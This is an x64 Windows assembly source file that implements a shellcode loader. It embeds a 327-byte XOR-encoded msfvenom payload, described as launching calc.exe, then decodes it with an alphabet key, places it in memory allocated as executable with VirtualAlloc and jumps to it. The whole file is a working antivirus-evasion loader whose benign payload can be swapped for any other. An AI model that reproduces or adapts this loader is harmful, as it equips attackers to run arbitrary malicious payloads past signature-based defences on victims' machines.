bits 64
default rel

; this shellcode just opens calc.exe
; msfvenom -p windows/x64/exec cmd=calc.exe -f c -b \x00\x0a\x0d\
section .data
    shellcode db 0xAA
              db 0x65
              db 0x18
              db 0x17
              db 0x1A
              db 0xF6
              db 0x90
              db 0xB4
              db 0xE7
              db 0x3F
              db 0xB6
              db 0x1B
              db 0x14
              db 0x1D
              db 0x11
              db 0xDA
              db 0x57
              db 0x62
              db 0x54
              db 0x1C
              db 0xAA
              db 0x91
              db 0x1F
              db 0xA7
              db 0x9F
              db 0x3C
              db 0x81
              db 0x7E
              db 0x12
              db 0xDD
              db 0x30
              db 0x42
              db 0xC6
              db 0x79
              db 0x9F
              db 0x3C
              db 0xA0
              db 0xA0
              db 0xAA
              db 0xB2
              db 0xAF
              db 0xA7
              db 0x84
              db 0xAE
              db 0xAD
              db 0xAC
              db 0x43
              db 0x82
              db 0xBD
              db 0x8
              db 0xCC
              db 0xAA
              db 0xBD
              db 0xFF
              db 0x96
              db 0x55
              db 0x54
              db 0x53
              db 0x13
              db 0x0
              db 0x11
              db 0xF
              db 0xC
              db 0xC
              db 0xA
              db 0x13
              db 0x6B
              db 0x8B
              db 0x3D
              db 0xF
              db 0xCD
              db 0x17
              db 0x24
              db 0xB
              db 0xC9
              db 0x13
              db 0x58
              db 0x7
              db 0xC5
              db 0x1F
              db 0x37
              db 0x1E
              db 0xDE
              db 0x26
              db 0x3
              db 0x1A
              db 0x5E
              db 0xE7
              db 0x15
              db 0x14
              db 0x10
              db 0x6D
              db 0x92
              db 0x12
              db 0x68
              db 0x98
              db 0xEB
              db 0x7A
              db 0x24
              db 0x38
              db 0x41
              db 0x6E
              db 0x61
              db 0x1
              db 0x8E
              db 0x87
              db 0x40
              db 0x56
              db 0x57
              db 0x94
              db 0xB6
              db 0xBE
              db 0x0
              db 0x10
              db 0x1
              db 0x17
              db 0xD5
              db 0xF
              db 0x7C
              db 0xD0
              db 0x18
              db 0x65
              db 0x10
              db 0x46
              db 0x96
              db 0xCE
              db 0xC4
              db 0xCB
              db 0x42
              db 0x41
              db 0x40
              db 0x7
              db 0xCB
              db 0x8D
              db 0x63
              db 0x31
              db 0x1D
              db 0x55
              db 0x83
              db 0x2
              db 0xDA
              db 0x18
              db 0x47
              db 0x1A
              db 0xD6
              db 0x1C
              db 0x7B
              db 0x13
              db 0x58
              db 0x88
              db 0xA4
              db 0x10
              db 0xD
              db 0xBB
              db 0x8A
              db 0x3
              db 0xCA
              db 0x74
              db 0xC7
              db 0x6
              db 0x4C
              db 0xC1
              db 0x1B
              db 0x64
              db 0x9D
              db 0x1B
              db 0x63
              db 0x91
              db 0xFC
              db 0x1E
              db 0x9F
              db 0x94
              db 0x51
              db 0x1A
              db 0x5B
              db 0x98
              db 0x60
              db 0xA7
              db 0x33
              db 0xB4
              db 0x8
              db 0x40
              db 0xE
              db 0x65
              db 0x48
              db 0xA
              db 0x77
              db 0x9C
              db 0x62
              db 0x8E
              db 0xD
              db 0x10
              db 0xD8
              db 0x12
              db 0x75
              db 0x19
              db 0x5E
              db 0x8E
              db 0x3B
              db 0x1D
              db 0xD0
              db 0x56
              db 0x11
              db 0x1C
              db 0xCC
              db 0x6
              db 0x59
              db 0xD
              db 0x42
              db 0x92
              db 0x0
              db 0xCB
              db 0x4B
              db 0xC6
              db 0x5
              db 0x16
              db 0x86
              db 0x14
              db 0xC
              db 0x12
              db 0xA
              db 0xF
              db 0x9
              db 0x5
              db 0x1F
              db 0x5
              db 0x1D
              db 0x2
              db 0x1B
              db 0x3
              db 0x10
              db 0xC4
              db 0xAA
              db 0x65
              db 0x5
              db 0x11
              db 0xBD
              db 0xA1
              db 0x18
              db 0xE
              db 0x17
              db 0x17
              db 0x5F
              db 0xDD
              db 0x47
              db 0xBD
              db 0x4
              db 0xAD
              db 0xAE
              db 0xAF
              db 0x2
              db 0x16
              db 0xE7
              db 0x5D
              db 0x5B
              db 0x5A
              db 0x59
              db 0x58
              db 0x47
              db 0x46
              db 0x45
              db 0xC
              db 0xCE
              db 0xCF
              db 0x40
              db 0x41
              db 0x4F
              db 0x4E
              db 0xC
              db 0xAD
              db 0x67
              db 0xDE
              db 0x3B
              db 0xD4
              db 0xAD
              db 0x84
              db 0xEB
              db 0xAF
              db 0xEB
              db 0xFF
              db 0xA
              db 0x1A
              db 0xE0
              db 0xFF
              db 0xCD
              db 0xFA
              db 0xDB
              db 0xBA
              db 0x91
              db 0xB
              db 0xC1
              db 0x85
              db 0x68
              db 0x73
              db 0x48
              db 0x31
              db 0x1D
              db 0xD6
              db 0xAE
              db 0xB4
              db 0x26
              db 0x57
              db 0xEA
              db 0x17
              db 0x4C
              db 0x2C
              db 0x32
              db 0x36
              db 0x5B
              db 0x3
              db 0x18
              db 0xD1
              db 0x9D
              db 0xB9
              db 0x90
              db 0x27
              db 0x22
              db 0x2E
              db 0x22
              db 0x6E
              db 0x2A
              db 0x36
              db 0x28
              db 0x17
              db 0x11
              db 0xDC
;shellcode size
;decimal: 327 
;hex:     147h
    key db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 0x0

section .bss
    handler resb 32
    decshell resb 147h

section .text

global main
extern  _CRT_INIT
extern  ExitProcess
extern  VirtualAlloc
extern  memmove

main:
    push    rbp
    mov     rbp, rsp
    sub     rsp, 38h
    call    _CRT_INIT

    mov     r9d, 40h
    mov     r8d, 1000h
    mov     edx, 147h
    xor     ecx, ecx
    call    VirtualAlloc

    mov     QWORD [handler], rax

    xor     r8, r8
    xor     r9, r9
    lea     rdx, shellcode 
    lea     rcx, key

xor_dec:
    cmp     r9, 1Ah
    jg      zero_j

    cmp     r8, 147h
    jg      exec_shell
    movzx   eax, byte [rdx+r8]
    movzx   ebx, byte [rcx+r9]

    xor     eax, ebx
    mov     [rdx+r8], al
    inc     r8
    inc     r9

    jmp     xor_dec

zero_j:
    xor     r9, r9
    jmp     xor_dec

exec_shell:
    mov     r8d, 147h
    lea     rdx, shellcode
    mov     rcx, [handler]
    call    memmove
    call    [handler]

exitMain:
    add     rsp, 38h
    pop     rbp
    xor     rax, rax
    call    ExitProcess
